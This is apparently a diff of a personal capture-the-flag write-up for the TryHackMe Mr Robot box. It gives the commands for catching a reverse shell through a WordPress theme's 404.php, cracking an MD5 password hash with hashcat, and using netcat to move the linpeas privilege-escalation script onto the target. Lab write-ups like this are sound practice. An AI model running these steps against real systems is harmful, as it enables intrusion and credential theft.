rusdog2784/try_hack_me/MrRobotCTF/README.txt

 		- Open a netcat connection on my local machine: `nc -lvpn 9999`
 		- Then go to: http://$IP/wp-content/themes/twentyfifteen/404.php
 		- And VOILA!
 You have yourself a reverse shell.

+	- Found a password.raw-md5 file at /home/robot/password.raw-md5
+		- Copied it to my local machine and am going to run hashcat on it.
+		- `hashcat -a 0 -m 0 -o cracked-password.raw-m5 c3fcd3d76192e4007dfb496cca67e13b /usr/share/wordlists/rockyou.txt`
+		- Cracked password: abcdefghijklmnopqrstuvwxyz
+		- `robot:abcdefghijklmnopqrstuvwxyz`

+	- Used Netcat to move my /root/dev/linpeas.sh file over to the machine.
+		- On my machine, I ran: `nc -q 0 -lvnp 1234 < linpeas.sh`
+		- On the THM box, I ran: `nc <MY IP> 1234 > linpeas.sh`
+		- Once downloaded, I changed the mode to executable: `chmod +x linpeas.sh`
+		- Ran linpeas and found nmap vulnerability.
+		- Side note: when I tried running linpeas.sh the first time, apparently is was already open somewhere else so I had to find the PID using this command, `fuser linpeas.sh`, then ran `kill <PID>` to stop it.